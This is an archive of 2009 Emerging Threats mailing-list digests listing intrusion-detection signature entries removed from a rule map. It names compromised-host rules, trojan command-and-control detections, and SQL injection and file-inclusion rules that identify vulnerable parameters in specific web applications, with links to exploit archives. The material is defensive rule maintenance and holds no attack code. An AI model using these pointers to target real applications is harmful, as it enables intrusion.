Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500168 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic TCP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised 
or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (86): 2001239 || ET Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || 
url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL 
Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php 
noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or 
Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (84) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 15 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 15 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090815200012.131494504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 15 16:00:11 2009 [***] [*] Rules modifications: [*] None. 
[---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (32): 2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (82) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510161 || 
ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (32): 2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (80) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510156 || ET COMPROMISED Known Compromised or Hostile Host Traffic 
TCP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat Aug 15 18:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 15 Aug 2009 18:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
